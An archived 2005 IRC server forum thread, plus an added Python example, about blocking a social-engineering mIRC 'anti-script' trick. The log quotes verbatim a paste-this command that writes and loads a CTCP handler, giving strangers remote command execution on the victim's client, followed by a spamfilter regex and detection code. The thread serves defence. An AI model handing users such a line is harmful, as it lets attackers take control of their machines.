recent mirc idiotic crap

These are old archives. They are kept for historic purposes only.
xirian

Post by xirian » Fri Jun 17, 2005 4:17 pm

Lately my users have been getting a lot of this:
(11:53:19) <+Viper007Bond> [Fri 08:49:05] <kairi> Have you heard about the irc control script?
(11:53:19) <+Viper007Bond> [Fri 08:49:22] <kairi> People can control what people say
(11:53:19) <+Viper007Bond> [Fri 08:49:39] <Viper007Bond> huh?
(11:53:19) <+Viper007Bond> [Fri 08:49:56] <kairi> Yeah it was on the news
(11:53:23) <+Viper007Bond> [Fri 08:50:29] <kairi> People can make people say stuff unless you type an anti script
(11:53:23) <+Viper007Bond> [Fri 08:50:47] <Viper007Bond> what's the anti-script?
(11:53:23) <+Viper007Bond> [Fri 08:51:27] <kairi> this is it //me :-) | write -c x ctcp 1:*:?:$1- | //me : | .load -rs x if you were vunrable it would say ctcp deactivated

What's an easy way to block the script line? And does anyone have any real idea what this does?

Syzop
UnrealIRCd head coder

Post by Syzop » Fri Jun 17, 2005 4:33 pm

This is quite a 'general' filter, but it should work (very?) well:

/spamfilter add p block - mirc_trojan_attempt //.*write.*\.load
Basically, it hunts for '//', then for 'write', and then for '.load'. If all 3 of these elements are present (one after the other), then it blocks the message.
Although there are other techniques, these probably match many of these "trojans"/"exploits".
xirian wrote: "And does anyone have any real idea what this does?"
It allows anyone to control the user (execute any command) via CTCP.
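
An added example, not part of the original posts and not UnrealIRCd code: a Python check of the posted pattern against constructed sample messages, next to a narrower hypothetical check (`write_then_load`) for a `write` of a ctcp event line into a file followed by a `load` of that same file. Case-insensitive matching and all function names here are assumptions.

```python
import re

# Pattern from the /spamfilter line above. Case-insensitive matching is an
# assumption about how the server applies it; the post does not say.
SPAMFILTER = re.compile(r"//.*write.*\.load", re.IGNORECASE)

def regex_hit(msg):
    """True if the posted spamfilter pattern matches anywhere in msg."""
    return SPAMFILTER.search(msg) is not None

def split_commands(msg):
    """Split the part of msg from the first '//' into '|'-separated commands,
    dropping leading '/' and the '.' prefix from each command name."""
    start = msg.find("//")
    if start < 0:
        return []
    parts = (p.strip().lstrip("/").lstrip(".").split() for p in msg[start:].split("|"))
    return [words for words in parts if words]

def write_then_load(msg):
    """Narrower check: a 'write' that puts a ctcp event line into a file,
    followed by a 'load' of that same file."""
    written = set()
    for words in split_commands(msg):
        cmd = words[0].lower()
        args = [w.lower() for w in words[1:] if not w.startswith("-")]
        if cmd == "write" and len(args) >= 2 and args[1] == "ctcp":
            written.add(args[0])
        elif cmd == "load" and args and args[0] in written:
            return True
    return False

# Constructed samples; the first is the line quoted in the thread.
SAMPLES = {
    "thread": "this is it //me :-) | write -c x ctcp 1:*:?:$1- | //me : | .load -rs x "
              "if you were vunrable it would say ctcp deactivated",
    "renamed": "//ME hi | WRITE -c y ctcp 1:*:?:$1- | .LOAD -rs y",
    "url": "I read http://example.org/faq about write and .load commands in mIRC",
    "chat": "can someone help me write a script?",
}

def classify(samples=SAMPLES):
    """Map each sample name to (regex_hit, write_then_load)."""
    return {name: (regex_hit(m), write_then_load(m)) for name, m in samples.items()}

if __name__ == "__main__":
    for name, result in classify().items():
        print(name, result)
```

The "url" sample is blocked by the pattern even though it contains no command sequence, which is the cost of a filter this general.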

xirian

Post by xirian » Fri Jun 17, 2005 4:55 pm

Thanks for the quick reply, hopefully this'll get them :)
